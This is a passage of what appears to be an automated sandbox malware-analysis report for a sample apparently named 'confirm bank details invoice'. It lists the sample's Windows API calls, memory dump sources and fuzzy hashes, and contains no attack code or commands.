                    • ScreenToClient.USER32(?,?), ref: 004EE6AF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: af7a4aad87dcacb878055a67ea44745ccca1eb592154fafdeefbdea6ab4aa7da
                    • Instruction ID: de829ba00011b7c5b7cc69215768a64422fb5618ca2903001e7e9b72aa53cd3e
                    • Opcode Fuzzy Hash: af7a4aad87dcacb878055a67ea44745ccca1eb592154fafdeefbdea6ab4aa7da
                    • Instruction Fuzzy Hash: 6D114C31900429BFDB11EFA5DC459FE77B9EF09309F500856F901E7240D738AA92CBA9
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 004B7352
                    • MessageBoxW.USER32(?,?,?,?), ref: 004B7385
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004B739B
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004B73A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                    • String ID:
                    • API String ID: 2880819207-0
                    • Opcode ID: 80a803134bf660052429d5d3fde8b60369e757cbc943ba2c1f8c28768ae4c043
                    • Instruction ID: c76a249f726a68a8fa2d8e64f67e9312c3faedaf8f83edb8951a0b50ac0a3082
                    • Opcode Fuzzy Hash: 80a803134bf660052429d5d3fde8b60369e757cbc943ba2c1f8c28768ae4c043
                    • Instruction Fuzzy Hash: A911E576A04204ABC7019B689C05AEF7BEE9B85310F144266FD21D3351D6748914D7B9
                    APIs
                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                    • GetStockObject.GDI32(00000011), ref: 0048D1CE
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateMessageObjectSendStockWindow
                    • String ID:
                    • API String ID: 3970641297-0
                    • Opcode ID: 59e9a08e90abc001f38090dea5a5a2bd5410f2f29fd67aeead3f2064314f04a5
                    • Instruction ID: 816fd28ff46fe24a0ce6f670e82d3937fa6e8f5251105916f3116ac605ace82c
                    • Opcode Fuzzy Hash: 59e9a08e90abc001f38090dea5a5a2bd5410f2f29fd67aeead3f2064314f04a5
                    • Instruction Fuzzy Hash: 5511A172902509BFEB026F919C58EEEBB6AFF08364F040116FA0592190CB359C60EBA4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                    • Instruction ID: 580c29c59e74f0ba3b38762f0ee9c22df0c5da6f38f01933d3fe5a42b6da496a
                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                    • Instruction Fuzzy Hash: 9D01427200014AFBCF125E84DD018EF3F22BBAE354B558456FE1859135D37ADAB1AB89
                    APIs
                      • Part of subcall function 00497A0D: __getptd_noexit.LIBCMT ref: 00497A0E
                    • __lock.LIBCMT ref: 0049748F
                    • InterlockedDecrement.KERNEL32(?), ref: 004974AC
                    • _free.LIBCMT ref: 004974BF
                    • InterlockedIncrement.KERNEL32(011126F0), ref: 004974D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 2704283638-0
                    • Opcode ID: f3a093f1b9274df999377abc98fa4a0ccd50d63c2f4b79d4e4d9292bd95287ef
                    • Instruction ID: 1aa6d5ff6cc52cad97f1669f0961b6d0e2c7ad8f5c886c2a9d53fa66cbec9877
                    • Opcode Fuzzy Hash: f3a093f1b9274df999377abc98fa4a0ccd50d63c2f4b79d4e4d9292bd95287ef
                    • Instruction Fuzzy Hash: 08018E31915622ABCF21AF25A80979EBF60BF05714F15412BF81467692C73C6941DBCA
                    APIs
                      • Part of subcall function 0048AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0048AFE3
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048AFF2
                      • Part of subcall function 0048AF83: BeginPath.GDI32(?), ref: 0048B009
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048B033
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004DEA8E
                    • LineTo.GDI32(00000000,?,?), ref: 004DEA9B
                    • EndPath.GDI32(00000000), ref: 004DEAAB
                    • StrokePath.GDI32(00000000), ref: 004DEAB9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 30c626d8eb42bc6dccd61d804abcdce8b246063122fd7d34fae816d69e3f8598
                    • Instruction ID: 0da2a9a498960624be48d6fab67f79e46728244fd02ebb24c97bb6b14b5f0b37
                    • Opcode Fuzzy Hash: 30c626d8eb42bc6dccd61d804abcdce8b246063122fd7d34fae816d69e3f8598
                    • Instruction Fuzzy Hash: CAF0E231401259BBDB12AFA4AD0EFDE3F1AAF16314F044103FB01652E18BB85521DBAD
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004AC84A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004AC85D
                    • GetCurrentThreadId.KERNEL32 ref: 004AC864
                    • AttachThreadInput.USER32(00000000), ref: 004AC86B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: 495a4f49b8732d36f588a969b2725aae94e973e4388e18872adb406ed55e19cd
                    • Instruction ID: 6754905ba225cc223bd031e574bd20b36ca2970b5a51b1af27e1454827c8c5a3
                    • Opcode Fuzzy Hash: 495a4f49b8732d36f588a969b2725aae94e973e4388e18872adb406ed55e19cd
                    • Instruction Fuzzy Hash: 79E0657154122876EB102B62DC4DFEB7F5DEF177A1F008026B50DC4450C679C591C7E4
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 004AB0D6
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,004AAC9D), ref: 004AB0DD
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004AAC9D), ref: 004AB0EA
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,004AAC9D), ref: 004AB0F1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 440b80ad9892d3fb8232015bb0a9340e9cb51a3fa441bb33f4853bb64089d7cf
                    • Instruction ID: 7a0e30bd378313125e74672dc469dafe5b4493f9e76cb03fc127a65128a779b1
                    • Opcode Fuzzy Hash: 440b80ad9892d3fb8232015bb0a9340e9cb51a3fa441bb33f4853bb64089d7cf
                    • Instruction Fuzzy Hash: F8E08632E01211AFD7201FB15D0CB5B3BA9EF56795F01C838F641D6080DB388411C768
                    APIs
                    • GetSysColor.USER32(00000008), ref: 0048B496
                    • SetTextColor.GDI32(?,000000FF), ref: 0048B4A0
                    • SetBkMode.GDI32(?,00000001), ref: 0048B4B5
                    • GetStockObject.GDI32(00000005), ref: 0048B4BD
                    • GetWindowDC.USER32(?,00000000), ref: 004EDE2B
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 004EDE38
                    • GetPixel.GDI32(00000000,?,00000000), ref: 004EDE51
                    • GetPixel.GDI32(00000000,00000000,?), ref: 004EDE6A
                    • GetPixel.GDI32(00000000,?,?), ref: 004EDE8A
                    • ReleaseDC.USER32(?,00000000), ref: 004EDE95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 90263245b60dcce18986e09d787bdebb50e276c557559bd5bd992dc9be8f3e4a
                    • Instruction ID: b27f68cc1a0a35cc79bfbcfc8f803ed93c8e2cce73819dac7e4434b87e99cfa2
                    • Opcode Fuzzy Hash: 90263245b60dcce18986e09d787bdebb50e276c557559bd5bd992dc9be8f3e4a
                    • Instruction Fuzzy Hash: 0EE06D31900280AEDB212F68AC0DBED3F12EB12336F10C626FAA9580E2C3754590DB15
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004AB2DF
                    • UnloadUserProfile.USERENV(?,?), ref: 004AB2EB
                    • CloseHandle.KERNEL32(?), ref: 004AB2F4
                    • CloseHandle.KERNEL32(?), ref: 004AB2FC
                      • Part of subcall function 004AAB24: GetProcessHeap.KERNEL32(00000000,?,004AA848), ref: 004AAB2B
                      • Part of subcall function 004AAB24: HeapFree.KERNEL32(00000000), ref: 004AAB32
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: e3ffb078c8250375ce382d1f96aea2c50605b022ff2e255c03a32cbad7969c4e
                    • Instruction ID: 5346c062901af815e40dba22b848888fd1eb89213d47a6d874ed3a489b507b15
                    • Opcode Fuzzy Hash: e3ffb078c8250375ce382d1f96aea2c50605b022ff2e255c03a32cbad7969c4e
                    • Instruction Fuzzy Hash: D8E0BF36504005BBCB012B95DC0886DFBA7FF993253108232F61581571CB32A471EB95
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 60af07703ba2a9c8665d61f33c51e3ef6e606c4b6a0904f384bcfd0c5c84fc10
                    • Instruction ID: 8a7ab6a561b8b69281afe71f74b52b25e4a142615716b5f9a755015d3d9dad82
                    • Opcode Fuzzy Hash: 60af07703ba2a9c8665d61f33c51e3ef6e606c4b6a0904f384bcfd0c5c84fc10
                    • Instruction Fuzzy Hash: 4EE01AB1900204EFEB015F70884CA3E7BA6EF4C355F11882AF95ACB250CB789851DB48
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: fb7fe1909ebdb4b51622deb6e3b69b43ac3a31915e5411d2e39c344d97c254fe
                    • Instruction ID: 97e2a537be56dc6781c54fa1172953ca0e0557108b1c4d20545bf25fab9722ab
                    • Opcode Fuzzy Hash: fb7fe1909ebdb4b51622deb6e3b69b43ac3a31915e5411d2e39c344d97c254fe
                    • Instruction Fuzzy Hash: 6FE046B1900200EFEB016F70C84CA3D7BAAEB4C355F11882AF95ACB250CFB89811CB08
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 004ADEAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: 1377c6f10d2d60490515aaa634c1329f79dbfc42481920eada220b04cfda7a1c
                    • Instruction ID: 1881ead7e2b6c2e4afd1ca021908c6675bdd6edab842c07d058df04f369c9057
                    • Opcode Fuzzy Hash: 1377c6f10d2d60490515aaa634c1329f79dbfc42481920eada220b04cfda7a1c
                    • Instruction Fuzzy Hash: 41914874A00601AFDB14DF64C884B6ABBF5BF5A714F10846EF94ACB690DB74E841CB64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscpy
                    • String ID: I/N$I/N
                    • API String ID: 3048848545-2393203907
                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                    • Instruction ID: 14b72cb9adf4888a8699357692311c96ba151d09b84b3dd53305a717b733d02e
                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                    • Instruction Fuzzy Hash: DF412A71A00216AACF25DF99D1819FEB770EF08314F50404FF885AB291D7B86E82C778
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 0048BCDA
                    • GlobalMemoryStatusEx.KERNEL32 ref: 0048BCF3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 810612dd959077ddf78e2f57f5b1d93352428cf77c85b44c75ecebf4af5e6c1f
                    • Instruction ID: 2c7eeeb4f97e5bf4df506f918c6b3bc4e80426569b782967c5e24e083c8a6942
                    • Opcode Fuzzy Hash: 810612dd959077ddf78e2f57f5b1d93352428cf77c85b44c75ecebf4af5e6c1f
                    • Instruction Fuzzy Hash: 6B515672408744ABE320AF55D886BAFBBE8FF95358F414C4EF1C8410A2DF7484A9875A
                    APIs
                      • Part of subcall function 004744ED: __fread_nolock.LIBCMT ref: 0047450B
                    • _wcscmp.LIBCMT ref: 004BC65D
                    • _wcscmp.LIBCMT ref: 004BC670
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 83bf2e0e1318289970447647951b80fa89cf4a2453105c6f00b0f466b0ca3ebf
                    • Instruction ID: 92bfadb3e2378eedd71a527c990d65e4e42eb2b7eb48fc2f38ff2a6b99ebcf3d
                    • Opcode Fuzzy Hash: 83bf2e0e1318289970447647951b80fa89cf4a2453105c6f00b0f466b0ca3ebf
                    • Instruction Fuzzy Hash: 91410872A0021ABADF109AA59C81FEF7BB9EF89714F00406BF615E7181D7789A04C765
                    APIs
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004DA85A
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004DA86F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: '
                    • API String ID: 3850602802-1997036262
                    • Opcode ID: 7fe5d561ca54ad7c23bfdf1548be7b951e1f6880a6728adcf32987838f9f697d
                    • Instruction ID: 87d60e10d3cb58a29f7109d479d2beb5ea7ce2e22a7b0b2d083d167138cb36c1
                    • Opcode Fuzzy Hash: 7fe5d561ca54ad7c23bfdf1548be7b951e1f6880a6728adcf32987838f9f697d
                    • Instruction Fuzzy Hash: 0741F574E012099FDB14DFA8C891BEABBB9FB08304F10006BE905EB341D774A952DFA5
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 004D980E
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004D984A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 331c77fd10a7745b0573dfc38991e224ae7a80bcefa024c5137a6aa95d97bcd6
                    • Instruction ID: 6f205114b044703304e21f5b0299622fe28f1c023bcef3c5d6dd52dd1b8fac4f
                    • Opcode Fuzzy Hash: 331c77fd10a7745b0573dfc38991e224ae7a80bcefa024c5137a6aa95d97bcd6
                    • Instruction Fuzzy Hash: FB319E71510604AAEB10AF75CC90BBB73A9FF59764F00861FF8A9D7290CB34AC81D768
                    APIs
                    • _memset.LIBCMT ref: 004B51C6
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004B5201
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 5aa530b0f52d48da0bc979d7c6904e2b41ca7a6bcfc21bf4fb4ae58ce3be3bc5
                    • Instruction ID: f92841434f31668b427a709a25cb26938c64353bed5a60c13070549b450e3313
                    • Opcode Fuzzy Hash: 5aa530b0f52d48da0bc979d7c6904e2b41ca7a6bcfc21bf4fb4ae58ce3be3bc5
                    • Instruction Fuzzy Hash: 1731C5319016049FEB28CF99E8457DEFBF4AF45350F14445BE981A6290D7789944CF29
                    APIs
                    Strings
                    Memory Dump Source
